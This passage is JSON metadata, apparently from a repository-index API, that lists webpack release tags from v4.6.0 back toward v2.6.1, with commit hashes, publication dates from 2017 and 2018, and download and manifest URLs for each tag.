ttps://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz